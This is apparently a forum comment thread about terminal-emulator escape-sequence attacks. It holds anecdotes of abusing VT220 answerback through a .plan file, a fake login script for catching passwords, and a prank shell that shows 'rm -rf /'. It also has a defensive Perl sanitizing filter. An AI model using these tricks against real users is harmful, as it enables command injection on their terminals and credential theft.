VT220s in my school lab used to have a feature that you can send them ACK character and they'll reply with a string configured in the terminal menu. I used to reprogram the string to do some UNIX commands and then put ^E in my .plan - back in the days when people used finger as a web browser. Also, you could just write a simple shell script that simulated the login sequence and leave it running without logging out. On older UNIX systems, this worked even over dialup if your shell script ignored SIGHUP.

But the later option was too risky for my taste, because the "login" process was owned by you. So instead, I wrote a doomsday shell script. It gave you a # prompt to make you believe you are running as root. It then emulated various UNIX commands. For example "jobs" showed [1] rm -rf / & and "kill" returned "Permission denied". It logged all the commands and responses to an obscure file in my home directory. Once I got our semi-knowlegable system administrator's assistant to "interact" with this script and it was quite fun reading him using kill 10 times in a row with the same arguments. She really thought the filesystem was going south.

Terrible abuse that can be inflicted on X terminals or public lab PCs with terminal emulators is left to the imagination of the reader.

Re:Forget about emulators, just hack real terminal

i dont believe you.

Re:CORRECTION to terminal emulators not susceptibl

> next if $line =~ m{... some regexp you want to ignore ...};

That is the wrong aproach, what if you didn't know that you should ignore some given text? I.e.
next if $line =~ /[^a-zA-Z0-9]/;
This asserts that you only accept stuff that you know is safe.

"Dumb terminal"

[wirelessbuzzers]

This story gives a whole new meaning to that phrase.

I think that's nonsense! (and the meaning of IT)

[@madeus]

I think that's nonsense.

I'm certainly not professing to be a great hacker, and I don't think people in that category would use that term to desribe themselves.

However...

Not bothering to spend the time working out why a given string crashes an xterm does not mean you are not a great hacker, let alone that you will never be one.

All it means is there was something else you would rather do instead. Which is not a bad thing.

Obviously, you can't fix every software bug in the world on your own - and clearly the best way to deal with them is not to try and fix them all personally, so another approach is needed.

To put it another way:

If everybody spent time trying to fix obscure bugs in other people's code while still trying to write their own software, all development would grind to a halt - developers would spend loads of time pouring over and trying to understand documentation for libraries and API's and going line by line through other people's, very possibly krufty, code - instead of spending time working on solving their own bugs.

If I found such a bug, I'd be likely to contact the author informing him (and provding some details as to why), and go back to fixing *my* bugs.

Although it's no bad thing to debug and fix bugs in other poeple's code if you have some free time and no projects of your own, it's simply far more logical and efficent to spend time fixing your own bugs.

PS: FWIW, IMHO, 'it' is simply equal lashings of time and effort and a dollop of hubris to taste, served on a bed of sufficent basic intelligence. The 'time' and 'effort' ingredients being the hardest to come across.

Re:CORRECTION to terminal emulators not susceptibl

[chongo]

Perhaps the following comments will help you understand how my Perl filter example protects terminal emulators ... even terminal emulators that are subject to the kind of attack discussed in the referenced article.

Lines such as:

$line =~ s/... some common phrase you want to ignore ...//;
next if $line =~ m{... etc ...};

serve as part of the ''removes certain types of messages'' processing. And lines such as:

$line =~ s/... some field you want to ignore ...//;
$line =~ s/... some common phrase you want to ignore ...//;

serve as part of the ''removes certain types of ... fields'' processing. And lines such as:

$line =~ s/^(.{1,224}).*$/$1/;

serve as part of the ''trims to 224 characters'' processing. And lines such as:

chomp $line;
...
print "$line\n";

ensure that each message read is printed with a trailing newline.

To protect terminal emulators, the following lines are used:

$line =~ s/\t/ /g;
$line =~ s/[^ -~]/~/g;

For systems using ASCII (and a number of other widely used character sets), it replaces potentially dangerous characters with ~ (tilde) characters. The replacement is 1-for-1, so the layout of the original message is mostly preserved.

I say ''mostly preserved'' because a tabs are replaced with space. I prefer to view whitespace as just token separators and to reduce them where reasonable. A more complete whitespace crusher would use:

$line =~ s/\s+/ /g;
$line =~ s/[^ -~]/~/g;

On the other hand, you might want to keep all whitespace as it is when tailing log messages in your terminal emulator window, so:

$line =~ s/[^\s!-~]/~/g;

would do the trick.

And of course one could write the regexp to not depend on a character set order. I'll leave that exercise up to the reader. :-)

BTW: I prefer to replace strange characters instead of tossing them. Tossing strange characters instead of replacing them could would allow a system cracker to potentially mimic a valid messages knowing that invalid chars would simply be tossed. And I usually want to know when strange chars appear in the logs.

I hope this helps.

FYI...GoGlobal is safe

[OrbNobz]

I just tried this in GoGlobal 1.63:

bash$ echo -e "\e]2;This is the new window title\a"
2;This is the new window title

Dunno, maybe it's a different code number.
Somebody let me know...
YMMV

- OrbNobz
Finding more and more people obsequious, obstreperous, and ubiquitous.